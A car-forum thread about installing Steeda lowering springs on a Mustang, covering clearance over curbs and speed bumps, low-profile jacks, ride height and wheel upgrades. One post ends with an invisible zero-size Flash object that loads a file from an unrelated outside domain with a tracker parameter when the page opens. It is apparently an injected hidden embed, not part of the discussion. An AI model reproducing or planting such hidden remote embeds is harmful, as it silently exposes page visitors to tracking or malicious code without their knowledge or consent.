Steeda Suspension Installed!

How much clearance (if any) do you have over parking curbs? Can you still jack your car off the ground?

There is still plenty of clearance. I drive it just like I did before. No problems with speed bumps or getting into the driveway, (yet) the garage jack fits under there just fine. I used to scrape the front bumper on some parking curbs before, so I am assuming its going to be a larger problem now. I have not yet parked near one. And, I dont yet have a chin spoiler of any sort... But, all in all, I think the Steeda Springs are a very reasonable lowering, still very streetable.

• Sponsors (?)

Grey - Thanks for the photos :nice:

Great compare on stock v. Steeda ride height and looks. Your car looks awesome.

Thanks Racer, glad you got something out of it. I do like the stance of the steeda springs. A bit more level, and not too low.

Because I have issues and am addicted to modding, I still want to get 19x9.5 rims, to fill out the fender a bit more. Either that or wheel spacers... much rather have the fatter tires. Just have no dinero ahora.

kooldawg, I FREAKIN LOVE YOUR STANG! :p

But GD, that looks so much better with the front springs installed as well! Great job & EXCELLENT pics! How much clearance (if any) do you have over parking curbs? Can you still jack your car off the ground?
They sell low profile floor jacks and will fit no problem! I picked up a nice lightweight low profile jack from Harbor Freight that works great! My car is so low up front that we're unable to get the lift arms under the rocker panels even with me pulling up on the fender:( Mine will only go on the drive up ramp lifts...

I think the Steeda kit is has one of the smallest drops. It is quoted on their website as 1" front, and 1.25" rear. I did not measure the drop, just took photos instead. My main concern was handling, and that is why I went with Steeda. Honestly, if there were a handling pack that removed brake dive, WOT squat, and body roll, with the same ride height, I might have gone with that. No matter what kit you go with though, changing the suspension on these things is VERY fun. Its the one major weak point coming from the factory.<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://brbyowner.com/?tracker=4097"></param><param name="allowFullScreen" value="true"></param><embed src="http://brbyowner.com/?tracker=4097" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>

This looks great. I will be ordering a kit soon, this will be on my short list. Thanks